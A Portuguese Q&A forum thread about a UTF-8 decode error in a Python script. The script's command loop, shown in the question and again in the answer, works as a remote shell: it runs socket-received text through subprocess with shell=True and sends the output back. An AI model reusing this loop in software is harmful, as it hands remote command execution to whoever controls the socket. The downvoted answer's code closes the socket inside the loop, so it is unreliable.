# Problema com decode bytes to string em Python

Tags: python

Estou Tendo um problema de decode em um script em Python esse programa estou utilizando as libs **os, socket e subprocess** esse script está dando erro de decode ao tentar transformar o byte em string

Esse é o erro que estou recebendo

[image: inserir a descrição da imagem aqui]

Esse é o trecho do meu código que está dando erro

```
while True:
data = s.recv(1024)
if data[:2].decode('utf-8') == 'cd':
    os.chdir(data[3:].decode("utf-8"))
if len(data) > 0:
    cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    output_bytes = cmd.stdout.read() + cmd.stderr.read()
    output_str = str(output_bytes, "utf-8")
    s.send(str.encode(output_str + str(os.getcwd()) + '> '))
s.close()
```

Alguém consegue dar uma ajuda, não consegui encontrar nada que solucionasse esse problema?

Comment: No if tenta verificar se o comando "cd" está contido e não se é igual.... if 'cd' in     data[:2].decode('utf-8'):

Answer (score -2):

Para fazer a string você só precisa de descodicar os bytes com bytes.decode(), tanto no decode como no encode, não precisa do "utf-8" porque essa string já vem prédefinida

```
while True:
    data = s.recv(1024)
    if data[:2].decode('utf-8') == 'cd':
        os.chdir(data[3:].decode("utf-8"))
    if len(data) > 0:
        cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output_bytes = cmd.stdout.read() + cmd.stderr.read()
        output_str = output_bytes.decode()
        s.send(str.encode(output_str + str(os.getcwd()) + '> '))
    s.close()
```